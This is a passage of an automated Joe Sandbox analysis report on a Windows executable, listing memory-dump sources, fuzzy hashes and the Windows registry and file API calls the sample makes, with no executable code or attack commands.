                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseQueryValue
                                                                                                      • String ID: Call
                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                      • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                      • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                      • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                      • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                      • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                      • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                      • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                      • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                      • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                      • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                      • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                      • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                      • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                      • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                      • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                      • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                      • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                      • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                      • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                      • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                      • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                      • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                      • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                        • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                      • SetFilePointer.KERNELBASE(0015A7DF,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer$CountTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 1092082344-0
                                                                                                      • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                      • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                      • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                      • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                      APIs
                                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Enum$CloseValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 397863658-0
                                                                                                      • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                      • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                      • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                      • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 973152223-0
                                                                                                      • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                      • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                      • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                      • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                      APIs
                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3356406503-0
                                                                                                      • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                      • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                      • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                      • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                      APIs
                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 2831762973-0
                                                                                                      • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                      • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                      • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                      • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                        • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                        • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                        • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 2547128583-0
                                                                                                      • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                      • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                      • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                      • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405EE2
                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesCreate
                                                                                                      • String ID:
                                                                                                      • API String ID: 415043291-0
                                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
